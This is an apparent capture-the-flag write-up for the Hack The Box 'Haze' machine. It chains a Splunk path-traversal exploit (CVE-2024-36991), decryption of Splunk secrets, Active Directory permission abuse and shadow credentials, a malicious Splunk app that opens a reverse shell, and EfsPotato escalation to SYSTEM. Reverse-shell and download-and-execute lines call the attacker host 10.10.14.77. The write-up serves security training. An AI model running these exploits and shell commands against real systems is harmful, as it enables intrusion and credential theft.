Haze
Recon
HTTP (8000)
80/443 is closed, but 8000 stands out with Splunk header.
splunkd discloses the version information on port 8089. There's 4 routes, but we don't have access to them without credentials.
Check for vulnerabilities for this version https://advisory.splunk.com/?301=/en_us/product-security.html
CVE-2024-36991 stands out because we are attacking Windows machine and severity is also High, other payloads may require authentication.
POC: CVE-2024-36991. TLDR: It's fucking os.path.join again, why can't people just use Pathlib
PoC works, but there's /etc/passwd which contains passwords on Windows???
└─$ git clone https://github.com/bigb0x/CVE-2024-36991.git -q
└─$ py CVE-2024-36991/CVE-2024-36991.py -u http://haze.htb:8000
[INFO] Log directory created: logs
[INFO] Testing single target: http://haze.htb:8000
[VLUN] Vulnerable: http://haze.htb:8000
:admin:$6$Ak3m7.aHgb/NOQez$O7C8Ck2lg5RaXJs9FrwPr7xbJBJxMCpqIx3TG30Pvl7JSvv0pn3vtYnt8qF4WhL7hBZygwemqn7PBj5dLBm0D1::Administrator:admin:changeme@example.com:::20152
:edward:$6$3LQHFzfmlpMgxY57$Sk32K6eknpAtcT23h6igJRuM1eCe7WAfygm103cQ22/Niwp1pTCKzc0Ok1qhV25UsoUN4t7HYfoGDb4ZCv8pw1::Edward@haze.htb:user:Edward@haze.htb:::20152
:mark:$6$j4QsAJiV8mLg/bhA$Oa/l2cgCXF8Ux7xIaDe3dMW6.Qfobo0PtztrVMHZgdGa1j8423jUvMqYuqjZa/LPd.xryUwe699/8SgNC6v2H/:::user:Mark@haze.htb:::20152
:paul:$6$Y5ds8NjDLd7SzOTW$Zg/WOJxk38KtI.ci9RFl87hhWSawfpT6X.woxTvB4rduL4rDKkE.psK7eXm6TgriABAhqdCPI4P0hcB8xz0cd1:::user:paul@haze.htb:::20152Make script more interactive with file of our choice.
from pathlib import Path
from argparse import ArgumentParser
import requests
parser = ArgumentParser()
parser.add_argument('-u', '--url', help='Target URL (e.g., http://example.com)')
parser.add_argument('-f', '--file', help='Target File')
parser.add_argument('-d', '--download', help='Download instead of print', action='store_true')
args = parser.parse_args()
## Relative
payload = payload = "/en-US/modules/messaging/C:../C:../C:../C:../C:..%s" % args.file
## Absolute
# payload = payload = "/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:..%s" % args.file
target = f"{args.url}{payload}"
print(f'Target URL: {target}\n')
resp = requests.get(target)
if '404 Not Found' in resp.text:
print('File not found')
exit(1)
if args.download:
with open(Path(args.file).name, 'w') as f:
f.write(resp.text)
else:
print(resp.text)hostname doesn't exist so passwd file is some decoy or smth
└─$ py lfi.py -u http://haze.htb:8000 -f /etc/hostname
Target URL: http://haze.htb:8000//en-US/modules/messaging/C:../C:../C:../C:../C:../etc/hostname
File not found
└─$ py lfi.py -u http://haze.htb:8000 -f /etc/passwd
Target URL: http://haze.htb:8000//en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd
:admin:$6$Ak3m7.aHgb/NOQez$O7C8Ck2lg5RaXJs9FrwPr7xbJBJxMCpqIx3TG30Pvl7JSvv0pn3vtYnt8qF4WhL7hBZygwemqn7PBj5dLBm0D1::Administrator:admin:changeme@example.com:::20152
...Splunk uses Linux like structure for storing the files, configuration and whatnot
https://docs.splunk.com/Documentation/Splunk/latest/Admin/Listofconfigurationfileshttps://docs.splunk.com/Documentation/Splunk/latest/Admin/Wheretofindtheconfigurationfiles
server.conf: Contains a variety of settings for configuring the overall state of a Splunk Enterprise instance
└─$ py lfi.py -u http://haze.htb:8000 -f '/etc/system/default/server.conf'
...default splunk config..
└─$ py lfi.py -u http://haze.htb:8000 -f '/etc/system/local/server.conf'
Target URL: http://haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../etc/system/local/server.conf
[general]
serverName = dc01
pass4SymmKey = $7$lPCemQk01ejJvI8nwCjXjx7PJclrQJ+SfC3/ST+K0s+1LsdlNuXwlA==
[sslConfig]
sslPassword = $7$/nq/of9YXJfJY+DzwGMxgOmH4Fc0dgNwc5qfCiBhwdYvg9+0OCCcQw==
[lmpool:auto_generated_pool_download-trial]
description = auto_generated_pool_download-trial
peers = *
quota = MAX
stack_id = download-trial
[lmpool:auto_generated_pool_forwarder]
description = auto_generated_pool_forwarder
peers = *
quota = MAX
stack_id = forwarder
[lmpool:auto_generated_pool_free]
description = auto_generated_pool_free
peers = *
quota = MAX
stack_id = freeauthentication.conf: Toggle between Splunk's built-in authentication or LDAP, and configure LDAP.
└─$ py lfi.py -u http://haze.htb:8000 -f '/etc/system/local/authentication.conf'
Target URL: http://haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:..//etc/system/local/authentication.conf
...
[Haze LDAP Auth]
SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
charset = utf8
emailAttribute = mail
enableRangeRetrieval = 0
groupBaseDN = CN=Splunk_LDAP_Auth,CN=Users,DC=haze,DC=htb
groupMappingAttribute = dn
groupMemberAttribute = member
groupNameAttribute = cn
host = dc01.haze.htb
nestedGroups = 0
network_timeout = 20
pagelimit = -1
port = 389
realNameAttribute = cn
sizelimit = 1000
timelimit = 15
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname
[authentication]
authSettings = Haze LDAP Auth
authType = LDAPSplunkSecrets
To decrypt splunk secrets splunk command is required, but alternative is always there. Secrets file is required (https://community.splunk.com/t5/Knowledge-Management/What-is-the-splunk-secret-file-and-is-it-possible-to-change-it/m-p/331207)
└─$ pip install git+https://github.com/HurricaneLabs/splunksecrets.git
└─$ py lfi.py -u http://haze.htb:8000 -f '/etc/auth/splunk.secret'
Target URL: http://haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../etc/auth/splunk.secret
NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD
└─$ py lfi.py -u http://haze.htb:8000 -f '/etc/auth/splunk.secret' -d
└─$ splunksecrets splunk-decrypt -S splunk.secret # bindDNpassword
Ciphertext: $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
Ld@p_Auth_Sp1unk@2k24
└─$ splunksecrets splunk-decrypt -S splunk.secret # pass4SymmKey
Ciphertext: $7$lPCemQk01ejJvI8nwCjXjx7PJclrQJ+SfC3/ST+K0s+1LsdlNuXwlA==
changeme
└─$ splunksecrets splunk-decrypt -S splunk.secret # sslPassword
Ciphertext: $7$/nq/of9YXJfJY+DzwGMxgOmH4Fc0dgNwc5qfCiBhwdYvg9+0OCCcQw==
passwordGenerate possible AD usernames and try passwords
└─$ namebuster 'Paul Taylor' > usernames.txt
└─$ netexec ldap dc01.haze.htb -u usernames.txt -p 'Ld@p_Auth_Sp1unk@2k24'
LDAP 10.129.31.43 389 DC01 [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24SMB (135)
SMB share is empty, but we can get valid users
└─$ netexec smb dc01.haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | tee rid-brute.log
└─$ grep 'User' rid-brute.log | awk '{print($6)}' | tee users.txt
HAZE\Administrator
HAZE\Guest
HAZE\krbtgt
HAZE\Domain
HAZE\Protected
HAZE\DC01$
HAZE\paul.taylor
HAZE\mark.adams
HAZE\edward.martin
HAZE\alexander.green
HAZE\Haze-IT-Backup$Check password reuse
└─$ netexec smb dc01.haze.htb -u users.txt -p 'Ld@p_Auth_Sp1unk@2k24' --continue-on-success
SMB 10.129.31.43 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
...
SMB 10.129.31.43 445 DC01 [+] HAZE\paul.taylor:Ld@p_Auth_Sp1unk@2k24
SMB 10.129.31.43 445 DC01 [+] HAZE\mark.adams:Ld@p_Auth_Sp1unk@2k24
...Bloodhound
Enumerate with Bloodhound.
└─$ bloodhound-python -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -ns 10.129.31.43 -dc dc01.haze.htb -c all --zip -op paul
...
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
...
└─$ sudo ntpdate haze.htb
CLOCK: time stepped by 28800.753143
└─$ echo $(( 28800.753143 / 3600 ))
8.0002092063888899
└─$ faketime -f +8h bloodhound-python -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -ns 10.129.31.43 -dc dc01.haze.htb -c all --zip -op paul
INFO: Found AD domain: haze.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 3 users
INFO: Found 32 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 18 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.haze.htb
INFO: Done in 00M 19S
INFO: Compressing output into 20250330174231_bloodhound.zip
└─$ faketime -f +8h bloodhound-python -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -ns 10.129.31.43 -dc dc01.haze.htb -c all --zip -op mark
INFO: Found AD domain: haze.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 8 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.haze.htb
INFO: Done in 00M 17S
INFO: Compressing output into 20250330174351_bloodhound.zipNote: There was an error with Kerberos time skew, fix it with
faketimeto avoid any data loss.
From bloodhound it seems mark has more permissions then paul.
GMSA (mark.adams)
GMSA fails, so something must be preventing reading the value
└─$ netexec ldap dc01.haze.htb -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa
LDAP 10.129.31.43 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
LDAPS 10.129.31.43 636 DC01 [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24
LDAPS 10.129.31.43 636 DC01 [*] Getting GMSA Passwords
LDAPS 10.129.31.43 636 DC01 Account: Haze-IT-Backup$ NTLM:Add-ADPermission fails because the command doesn't seem to exist
*Evil-WinRM* PS C:\Users\mark.adams\Music> Add-ADPermission -Identity (Get-ADServiceAccount -Identity "Haze-IT-Backup$") -User (Get-ADUser -Identity "mark.adams") -AccessRights GenericRead -Properties msDS-ManagedPasswordGet existing commands for ADServiceAccount manipulation
*Evil-WinRM* PS C:\Users\mark.adams\Music> Get-Command *-ADServiceAccount
CommandType Name Version Source
----------- ---- ------- ------
Cmdlet Get-ADServiceAccount 1.0.1.0 ActiveDirectory
Cmdlet Install-ADServiceAccount 1.0.1.0 ActiveDirectory
Cmdlet New-ADServiceAccount 1.0.1.0 ActiveDirectory
Cmdlet Remove-ADServiceAccount 1.0.1.0 ActiveDirectory
Cmdlet Set-ADServiceAccount 1.0.1.0 ActiveDirectory
Cmdlet Test-ADServiceAccount 1.0.1.0 ActiveDirectory
Cmdlet Uninstall-ADServiceAccount 1.0.1.0 ActiveDirectoryInspect if you can read the value:
*Evil-WinRM* PS C:\Users\mark.adams\Music> Get-ADServiceAccount -Identity 'Haze-IT-Backup' -Property msDS-ManagedPassword
DistinguishedName : CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
Enabled : True
Name : Haze-IT-Backup
ObjectClass : msDS-GroupManagedServiceAccount
ObjectGUID : 66f8d593-2f0b-4a56-95b4-01b326c7a780
SamAccountName : Haze-IT-Backup$
SID : S-1-5-21-323145914-28650650-2368316563-1111
UserPrincipalName :Grant read permission and check the value again
*Evil-WinRM* PS C:\Users\mark.adams\Music> Set-ADServiceAccount -Identity "Haze-IT-Backup$" -PrincipalsAllowedToRetrieveManagedPassword "mark.adams"
*Evil-WinRM* PS C:\Users\mark.adams\Music> Get-ADServiceAccount -Identity 'Haze-IT-Backup' -Property msDS-ManagedPassword
DistinguishedName : CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
Enabled : True
msDS-ManagedPassword : {1, 0, 0, 0...}
Name : Haze-IT-Backup
ObjectClass : msDS-GroupManagedServiceAccount
ObjectGUID : 66f8d593-2f0b-4a56-95b4-01b326c7a780
SamAccountName : Haze-IT-Backup$
SID : S-1-5-21-323145914-28650650-2368316563-1111
UserPrincipalName :Now we are able to read GMSA for Haze-IT-Backup
└─$ netexec ldap dc01.haze.htb -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa
LDAPS 10.129.31.43 636 DC01 Account: Haze-IT-Backup$ NTLM: 735c02c6b2dc54c3c8c6891f55279ebcHAZE-IT-BACKUP
OPSEC:
The computer
HAZE-IT-BACKUP$@HAZE.HTBhas the ability to modify the owner of the group SUPPORTSERVICES@HAZE.HTB.Object owners retain the ability to modify object security descriptors, regardless of permissions on the object's DACL.
https://www.thehacker.recipes/ad/movement/dacl/grant-ownership
└─$ bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735c02c6b2dc54c3c8c6891f55279ebc" set owner 'Support_Services' 'Haze-IT-Backup$'
[+] Old owner S-1-5-21-323145914-28650650-2368316563-512 is now replaced by Haze-IT-Backup$ on Support_Serviceshttps://www.thehacker.recipes/ad/movement/dacl/grant-rights
└─$ faketime -f +8h bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735c02c6b2dc54c3c8c6891f55279ebc" add groupMember 'Support_Services' 'Haze-IT-Backup$'
[+] Haze-IT-Backup$ added to Support_Services
└─$ bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735c02c6b2dc54c3c8c6891f55279ebc" add genericAll 'Support_Services' 'Haze-IT-Backup$'
[+] Haze-IT-Backup$ has now GenericAll on Support_ServicesNote: Not positive why, but
genericAlldidn't work formark.adams
Shadow Credentials
Update bloodhound data
└─$ bloodhound-python -u 'Haze-IT-Backup$' --hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -d haze.htb -ns 10.129.31.43 -dc dc01.haze.htb -c all --zip -op it
└─$ faketime -f +8h certipy-ad shadow auto -u 'Haze-IT-Backup$@haze.htb' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -account edward.martin -target haze.htb -dc-ip 10.129.31.43
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'edward.martin'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '2b7e5660-91c2-d80c-1d44-03984c7891a0'
[*] Adding Key Credential with device ID '2b7e5660-91c2-d80c-1d44-03984c7891a0' to the Key Credentials for 'edward.martin'
[*] Successfully added Key Credential with device ID '2b7e5660-91c2-d80c-1d44-03984c7891a0' to the Key Credentials for 'edward.martin'
[*] Authenticating as 'edward.martin' with the certificate
[*] Using principal: edward.martin@haze.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'edward.martin.ccache'
[*] Trying to retrieve NT hash for 'edward.martin'
[*] Restoring the old Key Credentials for 'edward.martin'
[*] Successfully restored the old Key Credentials for 'edward.martin'
[*] NT hash for 'edward.martin': 09e0b3eeb2e7a6b0d419e9ff8f4d91afCan also be done with
bloodyAD->faketime -f +8h bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735c02c6b2dc54c3c8c6891f55279ebc" add shadowCredentials 'edward.martin', butcertipy-adis simpler.
You might want to execute commands quickly, because of HTB's 10 second cleanup rules..
faketime -f +8h bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735c02c6b2dc54c3c8c6891f55279ebc" set owner 'Support_Services' 'Haze-IT-Backup$'
faketime -f +8h bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735c02c6b2dc54c3c8c6891f55279ebc" add groupMember 'Support_Services' 'Haze-IT-Backup$'
faketime -f +8h bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735c02c6b2dc54c3c8c6891f55279ebc" add genericAll 'Support_Services' 'Haze-IT-Backup$'
faketime -f +8h certipy-ad shadow auto -u 'Haze-IT-Backup$@haze.htb' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -account edward.martin -target haze.htb -dc-ip 10.129.31.43WinRM (edward.martin)
└─$ netexec winrm dc01.haze.htb -u 'edward.martin' -H '09e0b3eeb2e7a6b0d419e9ff8f4d91af'
WINRM 10.129.31.43 5985 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
WINRM 10.129.31.43 5985 DC01 [+] haze.htb\edward.martin:09e0b3eeb2e7a6b0d419e9ff8f4d91af (Pwn3d!)└─$ evil-winrm -i 'dc01.haze.htb' -u 'edward.martin' -H '09e0b3eeb2e7a6b0d419e9ff8f4d91af'
*Evil-WinRM* PS C:\Users\edward.martin\Documents> whoami /all
User Name SID
================== ===========================================
haze\edward.martin S-1-5-21-323145914-28650650-2368316563-1105
Group Name Type SID Attributes
=========================================== ================ =========================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
HAZE\Backup_Reviewers Group S-1-5-21-323145914-28650650-2368316563-1109 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set EnabledUser.txt
*Evil-WinRM* PS C:\Users\edward.martin> cat Desktop/user.txt
69a27d7091c0a3a359b607b14a10069dPrivilege Escalation (alexander.green)
User is part of HAZE\Backup_Reviewers group and there's a Backups directory on root.
*Evil-WinRM* PS C:\Backups\Splunk> ls|%{$_.fullname}
C:\Backups\Splunk\splunk_backup_2024-08-06.zip
*Evil-WinRM* PS C:\Backups\Splunk> download C:\Backups\Splunk\splunk_backup_2024-08-06.zip└─$ 7z x splunk_backup_2024-08-06.zip
└─$ find . -empty -delete
└─$ find . -name *.conf | grep -v default
./var/run/splunk/confsnapshot/baseline_local/users/admin/user-prefs/local/user-prefs.conf
./var/run/splunk/confsnapshot/baseline_local/apps/splunk_instrumentation/local/telemetry.conf
./var/run/splunk/confsnapshot/baseline_local/apps/splunk_httpinput/local/app.conf
./var/run/splunk/confsnapshot/baseline_local/apps/splunk_assist/local/assist.conf
./var/run/splunk/confsnapshot/baseline_local/apps/learned/local/props.conf
./var/run/splunk/confsnapshot/baseline_local/system/local/migration.conf
./var/run/splunk/confsnapshot/baseline_local/system/local/authentication.conf
./var/run/splunk/confsnapshot/baseline_local/system/local/server.conf
./var/run/splunk/merged/web.conf
./var/run/splunk/merged/server.conf
./etc/splunk-launch.conf
./etc/users/admin/user-prefs/local/user-prefs.conf
./etc/modules/distributedDeployment/classes/deployable/inputs.conf
./etc/modules/distributedDeployment/classes/deployable/outputs.conf
./etc/modules/distributedDeployment/classes/deploymentserver/deployment.conf
./etc/openldap/ldap.conf└─$ cat ./var/run/splunk/confsnapshot/baseline_local/system/local/authentication.conf | grep bind
bindDN = CN=alexander.green,CN=Users,DC=haze,DC=htb
bindDNpassword = $1$YDz8WfhoCWmf6aTRkA+QqUI=
└─$ cat ./etc/auth/splunk.secret
CgL8i4HvEen3cCYOYZDBkuATi5WQuORBw9g4zp4pv5mpMcMF3sWKtaCWTX8Kc1BK3pb9HR13oJqHpvYLUZ.gIJIuYZCA/YNwbbI4fDkbpGD.8yX/8VPVTG22V5G5rDxO5qNzXSQIz3NBtFE6oPhVLAVOJ0EgCYGjuk.fgspXYUc9F24Q6P/QGB/XP8sLZ2h00FQYRmxaSUTAroHHz8fYIsChsea7GBRaolimfQLD7yWGefscTbuXOMJOrzr/6B
└─$ splunksecrets splunk-decrypt -S ./etc/auth/splunk.secret
Ciphertext: $1$YDz8WfhoCWmf6aTRkA+QqUI=
Sp1unkadmin@2k24Credentials don't work
└─$ netexec smb dc01.haze.htb -u 'alexander.green' -p 'Sp1unkadmin@2k24'
SMB 10.129.31.43 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB 10.129.31.43 445 DC01 [-] haze.htb\alexander.green:Sp1unkadmin@2k24 STATUS_LOGON_FAILUREReverse Shell
We are not able to login into the machine, but we can login into Splunk as Administrator with admin:Sp1unkadmin@2k24
Secure Splunk Enterprise service accounts: On Windows, the Local System user is often the best choice to run Splunk Enterprise.
└─$ git clone https://github.com/0xjpuff/reverse_shell_splunk.git -q
└─$ cd reverse_shell_splunk # DONT FORGET
└─$ cp /opt/scripts/shells/ConPtyShell/Invoke-ConPtyShell.ps1 .
└─$ echo 'Invoke-ConPtyShell 10.10.14.77 4444;' >> Invoke-ConPtyShell.ps1
└─$ serve # Http server
└─$ stty raw -echo; (stty size; cat) | nc -lvnp 4444 # Listener
└─$ tar -cvzf letmein.tgz reverse_shell_splunk
└─$ mv letmein.tgz letmein.splApps > Manage Apps
Install app from file
Upload malicious app
Change Sharing to All Apps (system)
After waiting for a minute nothing makes a callback 🤔
I made a mistake of not going inside directory; reverse_shell_splunk module is inside the git repository, git repository is not the module 😓 (Command above updated, so ignore)
PS C:\Windows\system32> whoami /all
User Name SID
==================== ===========================================
haze\alexander.green S-1-5-21-323145914-28650650-2368316563-1106
Group Name Type SID Attributes
========================================== ================ =========================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
HAZE\Splunk_Admins Group S-1-5-21-323145914-28650650-2368316563-1108 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
Privilege Name Description State
============================= ========================================= ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set DisabledSeImpersonatePrivilege
SeImpersonatePrivilege is useful for privilege escalation -> https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.html#seimpersonateprivilege
└─$ curl -LOs https://github.com/zcgonvh/EfsPotato/raw/master/EfsPotato.cs
PS C:\Windows\system32> cd ~/Music
PS C:\Users\alexander.green\Music> curl.exe 10.10.14.77/EfsPotato.cs -O
PS C:\Users\alexander.green\Music> ls C:\Windows\Microsoft.Net\Framework -rec -fil csc.exe | %{$_.FullName}
C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe
PS C:\Users\alexander.green\Music> C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe .\EfsPotato.cs -nowarn:1691,618
PS C:\Users\alexander.green\Music> .\EfsPotato 'whoami'
nt authority\system
PS C:\Users\alexander.green\Music> .\EfsPotato 'powershell -c IEX(IWR 10.10.14.77/Invoke-ConPtyShell.ps1 -UseBasicParsing)'nt authority\system Shell
nt authority\system Shell└─$ stty raw -echo; (stty size; cat) | nc -lvnp 4444
...
PS C:\Users\alexander.green\Music> whoami
nt authority\system
PS C:\Users\alexander.green\Music> cat /Users/Administrator/root.txt
27a454a7ca839375af60d82d4e1e520aLast updated